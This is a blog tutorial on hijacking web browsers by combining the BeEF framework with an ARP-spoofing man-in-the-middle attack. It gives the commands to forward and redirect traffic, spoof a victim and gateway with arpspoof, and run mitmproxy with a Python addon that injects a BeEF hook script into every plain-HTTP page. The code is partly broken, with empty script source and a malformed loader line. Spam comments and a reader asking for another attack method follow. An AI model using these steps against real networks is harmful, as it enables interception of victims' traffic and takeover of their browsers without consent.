top of page

Hacking browsers with BeEF and Man In The Middle Attack

In this article, I will demonstrate how the Browser Exploitation Framework (BeEF) can be used together with Man In The Middle Attack (MITM) to hack web browsers.

What is BeEF?

BeEF is an awesome penetration testing tool that is used to exploit browsers by first "hooking" them with a "hook.js" file. The idea is to make the victim open a web page on his browser that has this "hook.js" file embedded. This javascript file will then connect itself to the BeEF instance running on the hacker's machine, and the hooking is complete. The hacker can now control that particular web page and hence exploit the browser.

What is Man In The Middle Attack?

Man In The Middle Attack is where an attacker places himself between you, and your router using a technique known as ARP spoofing.

By doing so, all your Internet traffic is routed though the attacker's machine (the "man in the middle") instead of your router. This will give the attacker an advantage because he/she can now see and even modify your Internet traffic (both incoming and outgoing) as they want. This is obviously only valid only for websites that don't use a secure HTTPS connection. Since HTTPS provides authenticity and encryption, Man In The Middle Attack won't work on HTTPS websites.

Combining BeEF and Man In The Middle Attack

The idea is simple, we want to modify the internet traffic of the victim such that before sending him/her the website responses, we will inject the "hook.js" file in the response messages. In this way, BeEF can control all the websites that the victim is using on his browser.

Step 1. Install BeEF

BeEF comes pre-installed with Kali Linux, but if you want to install it manually you can do so,

sudo apt-get install beef-xss

Step 2. Run BeEF

You can start BeEF framework by typing this command

sudo beef-xss

This will start BeEF and serve a web interface at http://<IP>:3000/ui

Go to this URL, and login with the default credentials (username: beef, password: beef)

Now you can see the BeEF control panel

Step 3. Start the Man In The Middle Attack

In-order to start the MITM attack, you first need to enable IP forwarding on your Kali Linux,

sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -A FORWARD --in-interface [iface] -j ACCEPT
sudo iptables -t nat -A PREROUTING -i [iface] -p tcp --dport 80 -j REDIRECT --to-port 8080

Replace [iface] with your interface in the above commands. You can find out your interface name by typing in "ifconifg" in your terminal.

Next, you need to install the arpspoof utility.

sudo apt-get install dsniff

Then, start the ARP spoofing with the arpspoof utility.

In the first terminal, run

arpspoof -i [iface] -t [victim-ip] [gateway-ip]

The [victim-ip] should be the IP address of the victim, [gateway-ip] is the IP address of your router (you can find it out by typing in "ip route" in your terminal)

In your second terminal, run

arpspoof -i [iface] -t [gateway-ip] [victim-ip]

The Man In The Middle is now setup. All the victim's internet traffic on port 80 is routed through our machine. But, in order to monitor or modify the traffic, we need to use a proxy tool. We'll be using a tool called "mitmproxy".

First, install it

sudo apt-get install mitmproxy
pip install mitmproxy

Before we start the proxy tool, we need to write a python utility that will automatically inject the "hook.js" file in every response message captured by the proxy tool.

Here is the python script that does it,

import os
from bs4 import BeautifulSoup
from mitmproxy import http

class Injector:
    def load(self, loader):
            "script", str, "", "My Script Tag"

    def response(self, flow: http.HTTPFlow) -> None:
        if flow.response.headers.get("content-type").find("text/html") != -1:
            html = BeautifulSoup(flow.response.content, "html.parser")
            if html.head:
                script = html.new_tag(
                    "script", id="mitmproxy", src="", type="application/javascript")
                html.head.insert(0, script)
                flow.response.content = str(html).encode("utf8")

addons = [Injector()]

Replace the IP address with your IP address (where the BeEF is running)

Now, start the proxy tool by giving this python script as input.

mitmdump --mode transparent -s

This will start the proxy tool, and for every response it captures, it will execute the python script that is passed as input, which in turn will inject the "hook.js" file into the message.

That's it! Now, all the websites that work on plain HTTP are injected with the hook.js file and you can control all of them using BeEF control panel.

14,752 views7 comments


Scotwin Healthcare is Best PCD Pharma Franchise Company in India offers a wide range of high-quality pharmaceutical products for distribution. With a focus on innovation and customer satisfaction, we provide franchise opportunities for individuals and businesses looking to expand their reach in the healthcare industry. Our products are manufactured in state-of-the-art facilities and adhere to strict quality standards to ensure efficacy and safety for patients. Join us in our mission to make healthcare accessible to all across India.




Scotwin Healthcare stands out as the best pharma franchise company in India, offering top-quality products and services to its clients. With a strong reputation for excellence and reliability, Scotwin Healthcare is the ideal partner for those looking to establish a successful pharmaceutical business. Their wide range of products and commitment to customer satisfaction make them a trusted name in the industry.


Explore the leading pharma manufacturers in India. Connect with reliable suppliers for your pharmaceutical business. Reach out for a quote today.


Ranjith Chinnu
Ranjith Chinnu
Sep 28, 2023

Bro how to perform beef attack without man in the middle attack

Please make a blog for that also please

bottom of page